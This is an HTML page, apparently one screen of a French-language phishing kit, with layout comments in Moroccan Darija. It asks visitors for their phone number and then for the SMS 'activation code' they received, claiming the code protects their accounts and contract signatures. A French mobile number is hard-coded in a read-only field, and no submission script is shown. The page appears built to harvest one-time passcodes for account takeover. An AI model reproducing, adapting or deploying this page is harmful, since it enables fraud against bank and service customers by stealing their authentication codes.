<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<title></title>
	<link rel="stylesheet" href="./css/main-sms.css">
	<link rel="stylesheet" href="./css/media-sms.css">
</head>
<body>
	<div class="kolchi">
		
		<div class="header">
			<div class="header-left"></div>
			<!-- hena sala header left -->
			<div class="header-right"></div>
			<!-- hena sala header right -->
		</div>
		<!-- hena sala header -->
		<div class="header-phone">
				<div class="header-phone-left"></div>
				<div class="header-phone-right"></div>
	    </div>
			<!-- hena sala header right -->
		<div class="navbar">
			<div class="hr"></div>
			<div class="hr-bg">
				<div class="hr-tit"></div>
			</div>
		</div>
		<div class="navbar-phone"></div>
		<!-- hena sala navbar right -->
		<center>
			<div class="dakchi-west">

				<div class="dakchi-west-body">
					<div class="gog"></div>
					<div class="titi1"></div>
					<div class="stags1"></div> 
					<div class="stag-put">
						<div class="taga1"></div>
						<div class="stags1"></div>
					    <div class="stag-put2"><input type="text" pattern="\d*" class="helephone" maxlength="10" size="10" placeholder="Saisissez votre numéro de téléphone" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;"></div>
					    <div class="stags1"></div>
					    <div class="stag-put3">
					    	<center><div class="buta1">Enregistré</div></center>
					    </div>
					</div>
					<div class="hena-etap-sms">
						<div class="doda0">elle est indisponsable pour la protection de vos comptes et la signature de vos contrats un sms vient de vous être adressé avec un code d'activation</div>
						<div class="doda1"></div>
						<div class="doda-clear"></div>
						<div class="doda2"><input type="text" class="salas" value="0613534958" readonly=""></div>
						<div class="doda-clear"></div>
						<div class="doda3">
							<input type="text" class="helephone" maxlength="8" size="8" placeholder="Saisissez votre SMS reçu par téléphone" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;">
						</div>
						<div class="doda-clear"></div>
						<div class="doda4"><center><div class="buta1">Activer</div></center></div>
					</div>

				</div>
				
			</div>
			<!-- hena sala dakchi west -->
		</center>
    
	</div>
	<!-- hena sala kolchi -->
     <div class="foot"></div>
</body>
</html>